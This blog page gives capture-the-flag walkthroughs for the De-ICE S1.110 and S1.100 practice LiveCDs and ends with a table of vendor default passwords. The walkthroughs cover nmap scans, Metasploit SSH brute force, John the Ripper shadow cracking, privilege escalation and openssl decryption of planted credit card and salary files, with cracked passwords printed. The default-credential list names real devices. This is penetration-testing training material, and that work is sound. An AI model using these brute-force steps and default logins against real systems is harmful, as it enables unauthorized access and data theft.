pen test

All posts tagged pen test

While digging through an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

De-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information


Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root, password is at bottom of page. This assumes that you are using VMWare NAT and XX is the third octet of range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We are going to output the file as XML and practice using the Metasploit database. You can run it all from inside msfconsole using the db_nmap command with the normal nmap switches, but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a workspace named deice and sets it as the current working workspace.

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net
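The `-oX` file above is what `db_import` reads. As an added example (not code from the walkthrough), here is a small Python script that pulls the open ports and service versions out of an nmap XML file, which is flag 1, and also flags the open services that carry logins in the clear. The XML it parses is a constructed sample shaped like nmap's output, with the four open ports the text mentions, not a real scan of the LiveCD.

```python
"""Added example (not from the walkthrough): read nmap -oX output and list open ports.

This does in a few lines what `db_import` + `services` did in msfconsole, and
adds a defender-side check for services that carry credentials in the clear.
The XML below is a constructed sample shaped like nmap's XML schema, not a
real scan of the LiveCD.
"""
import xml.etree.ElementTree as ET

# Constructed sample: four open TCP ports, one filtered, mirroring the text.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -T4 -O -oX deice110 192.168.42.110">
  <host>
    <status state="up"/>
    <address addr="192.168.42.110" addrtype="ipv4"/>
    <address addr="00:0C:29:00:00:00" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/><service name="ftp" product="vsftpd"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/><service name="ssh" product="OpenSSH" version="4.3"/>
      </port>
      <port protocol="tcp" portid="25">
        <state state="filtered"/><service name="smtp"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/><service name="http" product="Apache httpd" version="2.0.55"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/><service name="https"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Services whose logins normally cross the wire unencrypted.
CLEARTEXT_SERVICES = {"ftp", "telnet", "pop3", "imap", "http", "smtp"}


def parse_open_ports(xml_text):
    """Return {ip: [(port, proto, service, product, version), ...]} for open ports only."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        # Take the first IP address; skip MAC address entries.
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if ip is None:
            continue
        entries = []
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            entries.append((
                int(port.get("portid")),
                port.get("protocol"),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
        results[ip] = sorted(entries)
    return results


def format_services(results):
    """Render one line per open port, in the spirit of msfconsole's `services` table."""
    lines = []
    for ip, entries in sorted(results.items()):
        for port, proto, name, product, version in entries:
            info = " ".join(x for x in (product, version) if x)
            lines.append(f"{ip:<16}{port}/{proto:<8}{name:<10}{info}")
    return lines


def cleartext_services(results):
    """Open ports whose protocol sends credentials unencrypted: the first thing to fix."""
    return [(ip, port, name)
            for ip, entries in sorted(results.items())
            for port, _proto, name, _p, _v in entries
            if name in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_NMAP_XML)
    print("\n".join(format_services(found)))
    for ip, port, name in cleartext_services(found):
        print(f"cleartext credentials possible: {ip}:{port} ({name})")
```

Point `parse_open_ports` at the contents of a real `-oX` file to get the same per-host list; the filtered port 25 in the sample is dropped, which is the difference between "four ports open" and what a plain port list would show.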

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either the command line or FileZilla to get access to FTP.
I used FileZilla and downloaded everything.
The download/etc/shadow file seems promising.
John can work with the shadow file without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in download/opt/cygwin/etc but no shadow file, so moving along.
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that: it is a Linux core dump file. Go read up on that, we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the info and split it at the usernames. If you look at the shadow file from the 100 disk for the normal format: second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow

This gives us passwords for the following users: root, bbanter. SSH to the box as bbanter and su to root:

   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find . -iname '*.enc'

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc -d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Let’s go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file; the pass is in the “file” section. Let’s decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

While digging through an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHLAK still has the best Tux logo of any distro, RIP PHLAK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

De-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMware environment speed isn’t an issue, so -T5 it is. I also want to do OS detection and service enumeration, so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always begin by looking for low-hanging fruit. Since the FTP service looks to be broken based on the Nmap scan results, we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Mary marym@herot.net
Pat Patrick patrickp@herot.net
Terry Thompson thompsont@herot.net
Ben Benedict benedictb@herot.net
Erin Gennieg genniege@herot.net
Paul Michael michaelp@herot.net
Ester Long longe@herot.net
Adam Adams adamsa@herot.net
Bob Banter banterb@herot.net
Chad Coffee coffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last> and <first initial><last>. I’ve also seen <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that, and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use Metasploit to do the initial check for weak SSH passwords. You can set your options differently; this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true
run

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was an unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now, so let’s see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attack shadow files, so let’s try it using the rockyou wordlist. The first run uses single-crack mode, a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.

john --single de-iceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -
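Two things the walkthrough leaned on, the wheel membership hidden in the GID column of /etc/passwd and the md5crypt hashes John cracked, are what an administrator auditing this box should have caught. As an added example (not code from the walkthrough), the Python below audits constructed /etc/shadow, /etc/passwd and /etc/group samples shaped like the listings above: it classifies each hash by its crypt(3) prefix, reports empty or weak (descrypt/md5crypt) hashes and accounts whose password never expires, and lists who can reach su through wheel, counting primary-GID membership as well as the explicit member list. The hash bodies in the samples are placeholders, not real digests.

```python
"""Added example (not from the walkthrough): audit /etc/shadow, /etc/passwd and
/etc/group the way a defender would review the listings above.

It answers two questions the walkthrough raised: which accounts still use a
weak or missing password hash (what John chewed through), and who can reach
`su` via the wheel group, counting both explicit members and users whose
primary GID is wheel (aadams above is only in wheel that second way).
The three files below are constructed samples shaped like the LiveCD's.
"""

# Constructed samples (hash bodies are placeholders, not real digests).
SAMPLE_SHADOW = """\
root:$1$saltsalt$placeholderMd5CryptHashXXXXXX:13553:0:::::
bin:*:9797:0:::::
ftp::9797:0:::::
aadams:$1$saltsalt$placeholderMd5CryptHashYYYYYY:13550:0:99999:7:::
dmoore:$6$saltsalt$placeholderSha512CryptHashZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:17500:0:90:7:::
svc:!$6$saltsalt$placeholderLockedHashWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:17500:0:99999:7:::
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
dmoore:x:1003:100:,,,:/home/dmoore:/bin/bash
"""
SAMPLE_GROUP = """\
root::0:root
wheel::10:root,dmoore
users::100:
"""

WEAK_SCHEMES = {"descrypt", "md5crypt", "empty"}


def hash_scheme(field):
    """Classify the password field of a shadow entry by its crypt(3) prefix."""
    if field == "":
        return "empty"
    if field.startswith(("*", "!")):
        return "locked"
    prefixes = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
    for prefix, name in prefixes.items():
        if field.startswith(prefix):
            return name
    if "$" not in field and len(field) == 13:
        return "descrypt"          # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def audit_shadow(text):
    """One record per shadow line: scheme, whether it is weak, and whether it never expires."""
    report = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        user, pw = fields[0], fields[1]
        max_days = fields[4] if len(fields) > 4 else ""   # empty or 99999 = no aging
        scheme = hash_scheme(pw)
        report.append({
            "user": user,
            "scheme": scheme,
            "weak": scheme in WEAK_SCHEMES,
            "never_expires": scheme != "locked" and max_days in ("", "99999"),
        })
    return report


def weak_accounts(text):
    """Usernames whose hash a wordlist run like the one above would make short work of."""
    return [r["user"] for r in audit_shadow(text) if r["weak"]]


def wheel_members(passwd_text, group_text, group="wheel"):
    """Explicit members of `group` plus users whose primary GID is that group."""
    gid, explicit = None, set()
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[0] == group:
            gid = f[2]
            explicit = {m for m in f[3].split(",") if m}
    if gid is None:
        return []
    primary = {f[0] for f in (l.split(":") for l in passwd_text.splitlines())
               if len(f) >= 4 and f[3] == gid}
    return sorted(explicit | primary)


if __name__ == "__main__":
    for rec in audit_shadow(SAMPLE_SHADOW):
        print(rec)
    print("weak:", weak_accounts(SAMPLE_SHADOW))
    print("can su via wheel:", wheel_members(SAMPLE_PASSWD, SAMPLE_GROUP))
```

Feed the real files' contents to the same functions on a box you administer; the wheel check is the one most people miss, because `cat /etc/group` alone never shows a user whose only wheel membership is the primary GID in /etc/passwd.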

Now that we are root on the system, let’s look for sensitive data.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc. Google that; I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__ header and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption, and second, after some research we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We’ve got all the flags, time to call it a day.
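Both openssl steps on this page (the aes-256-cbc decrypt with `-pass file:` in the S1.110 walkthrough and the aes-128-cbc decrypt here) rest on the same legacy key derivation, which is why the /etc/passwd comment warns that changing root's password breaks the encryption: the passphrase is the only secret, and the salt sits in the file header. The Python below is an added example, not code from either walkthrough. It recognises the `Salted__` header that strings showed, splits out the 8-byte salt, derives the key and IV with OpenSSL's EVP_BytesToKey (MD5, one iteration, which is what the LiveCD's old OpenSSL used; OpenSSL 1.1.0 and later default to SHA-256 unless `-md md5` is given), and mimics how `-pass file:` takes only the first line of the file. All inputs are constructed; the block stops at key derivation and leaves the AES-CBC step to openssl itself.

```python
"""Added example (not from either walkthrough): recognise an `openssl enc`
file by its "Salted__" header and derive the key and IV the way legacy
`openssl enc` did, with OpenSSL's EVP_BytesToKey.

All inputs are constructed. The block stops at key derivation; the AES-CBC
step itself is what the `openssl ... -d` commands above perform.
"""
import hashlib

MAGIC = b"Salted__"


def is_openssl_salted(blob):
    """Cheap identifier for the format that `strings ... | head` hinted at above."""
    return blob.startswith(MAGIC) and len(blob) >= 16


def parse_salted(blob):
    """Split `openssl enc` output into (salt, ciphertext); raise if the header is absent."""
    if not is_openssl_salted(blob):
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, digest="md5"):
    """OpenSSL's legacy KDF: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt), concatenated.

    `digest` is "md5" for OpenSSL < 1.1.0 (and `-md md5`), "sha256" for the newer default.
    """
    needed = key_len + iv_len
    out, prev = b"", b""
    while len(out) < needed:
        prev = hashlib.new(digest, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:needed]


# Key and IV sizes for the cipher names used on this page (plus aes-192 for completeness).
CIPHER_SIZES = {"aes-128-cbc": (16, 16), "aes-192-cbc": (24, 16), "aes-256-cbc": (32, 16)}


def key_and_iv_for(cipher, password, blob, digest="md5"):
    """Key/IV that `openssl enc -<cipher> -d` would derive for `blob` from this passphrase."""
    key_len, iv_len = CIPHER_SIZES[cipher]
    salt, _ciphertext = parse_salted(blob)
    return evp_bytes_to_key(password, salt, key_len, iv_len, digest)


def passphrase_from_pass_file(contents):
    """`-pass file:path` uses the first line of the file, without its newline."""
    return contents.split(b"\n", 1)[0].rstrip(b"\r")


if __name__ == "__main__":
    # Constructed header + dummy ciphertext; there is no real encrypted payload here.
    sample = MAGIC + bytes(range(1, 9)) + b"\x00" * 32
    pw = passphrase_from_pass_file(b"example\n")          # constructed passphrase file
    key, iv = key_and_iv_for("aes-256-cbc", pw, sample)
    print("salt:", parse_salted(sample)[0].hex())
    print("key:", key.hex(), "iv:", iv.hex())
```

The defender's takeaway is in `evp_bytes_to_key`: one unsalted-by-design MD5 round per block means the passphrase, not the cipher, is the whole strength of the file, and a passphrase file such as the one copy.sh pointed at is worth exactly as much as the permissions on it.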


In the course of all the penetration tests we have tracked down lots of default passwords. Default passwords are a quick win on most penetration tests but usually don’t get the respect of a good remote code execution. Just because it isn’t sexy doesn’t mean you don’t get access.

This isn’t by any means a complete list but we hope it helps. The table is fairly large so feel free to filter and search. There is a notes field hidden to the right that has some helpful stuff in it but unfortunately it doesn’t fit well.


Default Password List

List of Default Passwords for Penetration Tests.
Device Type | Manufacturer | Model | Username | Password | Notes
ApplicationBrocadeSwitch Explorerrootfirbrannehttp://community.brocade.com/docs/DOC-1651
ApplicationBrocadeSwitch Exploreradminpassword
ApplicationFirebirdRDBMSSYSDBAmasterkey
ApplicationHPWebJet Adminadminadmin
ApplicationLantronixUDS1100Telnet
ApplicationSybaseSQLAnywheresa
ApplicationSymantecVPsymantecHash - VPUninstallPassword=S1084A085DC6BD2D755D4D6A7726
ApplicationWyseSQL AdminRapportThinMgmt
ApplicationWyseSQL AdminRapportThinMgmt451
ApplicationWyseFTPrapportr@p8p0r+
ApplicationWyseConsolerootwyse
ApplicationWyseConsoleroot
ApplicationWyseVNCVNCwinterm
ApplicationWyseVNCpassword
BIOSWyseBIOSFireport
InfrastructureAlcatel-LucentWebViewadminswitch
InfrastructureAPCAP9340apcapcadmin access
InfrastructureAPCAP9340deviceapcdevice only access
InfrastructureBlueSocketWireless LAN controlleradminblue
InfrastructureCiscoWireless LAN controlleradminadmin
InfrastructureDaktronicsGalaxyProDakpwdapplication password for FTP over non-standard port. Download software from Daktronics.com
InfrastructureDellPowerVault TL4000adminsecure
InfrastructureMitel3300 ICPsystempassword
InfrastructureMitel3300installer2000Telnet banner is SX-2000, only works for telnet access not web
InfrastructureNortelBusiness Secure RouternnadminPlsChgMe!
InfrastructurePolycomVBP 5300LF2root@#$%^&*!SSH - The password from support is @#$%^&*!() but DES ignores ()
MSSQLTrackit DatabaseInstance: TRACKITsaTI_DB_P@ssw0rdPort 64004
RemoteManagementDellDRACrootcalvin
RemoteManagementDellDRACuser1user1234user1:$1$nVOr80rB$HDAd6FRIG24k/WN4ZuYPC0:0:99999:7::: (not verified)
RemoteManagementHPiLO2adminadmin
WebApp3ComSuper StackmanagermanagerCIH 4400 44.70
WebApp3ComIntelliJack Switch NJ2000password
WebAppAdaptecStorage Managerraidraid
WebAppAlliance Storage TechnologiesUDO Archive Apllianceadminadminhttp://www.plasmontech.com/downloads2/pdf/aaequickstartguide_4_8xx.pdf
WebAppAxis540+/542+
WebAppBay NetworksBayStack 303/304manager
WebAppBoschDiBosAdministratorcase sensitive
WebAppCanonMF8050
WebAppCanoniR-ADV 403576543217654321
WebAppCarrierCNNWebsacarrier
WebAppCheck In SystemsCheck In Systemsmciadminhttp://www.medicalcheckin.com/Technical_Document_for_IT_Departments.pdf
WebAppCimetricBACnetadminadmin
WebAppCisco7936 Cisco IP Conference Stationadministrator**#
WebAppDellPowerVault 124Tadminpassword
WebAppDell2162DSAdmin
WebAppDellEquallogic PSgrpadmingrpadmin
WebAppDigiOneRealPortrootdbps
WebAppEatonPowerwareadminadmin
WebAppEMCNavispherenasadminpassword
WebAppHoneywellNetAXSadminadmin
WebAppHPSystem Management HomepageAdministatorAdministator
WebAppHPHPNASadministratorhpinvent
WebAppHPProcurveprocurvemodel 2501g
WebAppIBMAdvanced System Managementadminadmin
WebAppIBMAdvanced System Managementgeneralgeneral
WebAppIBMBaseboard Management controllerUSERIDPASSW0RDLook for BMC Login. Case sensitive and zero in password not 'oh'
WebAppInFocusLiteShow 3Admin Useradmin
WebAppInFocusLiteShow 3Basic Userbasic
WebAppIntelRemote Management Module 2adminpassword
WebAppIntelNetPort Expressrootworks on telnet or web
WebAppIntermeceasyLAN 100eIntermec
WebAppIntermeceasyLAN 10i2Intermec
WebAppJavaGlassfishadminadminadmin
WebAppKIPPrintNETkipkiptcpwrapped on port 80
WebAppKonica MinoltaPageScopeAdministator12345678bizhub C652
WebAppKyoceraCommand Center RXAdminAdmin
WebAppKyoceraCommand Centeradmin00
WebAppKyoceraHyPASAdminAdmin
WebAppLantronixUDS1100
WebAppLantronixXportadminPASS
WebAppLantronixXPORTlook for ltx_conf.htm
WebAppNEC (Digitcom)Univerge SV8100ADMIN10
WebAppNEC (Digitcom)Univerge SV8100necii47544
WebAppNEC (Digitcom)Univerge SV8100tech12345678
WebAppNEC (Digitcom)Univerge SV8100ADMIN29999
WebAppNEC (Digitcom)Univerge SV8100USER11111
WebAppNetgearGS108Tpassword
WebAppNetgearGS724tppassword
WebAppNetgearProSafenetgearnetgearruns on port 8080
WebAppNetgearGSM7328FSadmin
WebAppNortelBCMnnadminPlsChgMe!Look for BCM login as the prompt
WebAppOKIML590adminOkiLANcase sensitive
WebAppOKIC5200nrootLast 6 of MAC*Capitalize any letters
WebAppOTRSOTRSroot@localhostrootdoc.otrs.org/3.1/en/html/ - look for 'First Login'
WebAppPerleIOLANadminsuperuser
WebAppPolycomVBP 5300LF2rouserdefault
WebAppPrintekPrint Serveraccess
WebAppPrintSirWEBPORT 1.1admin
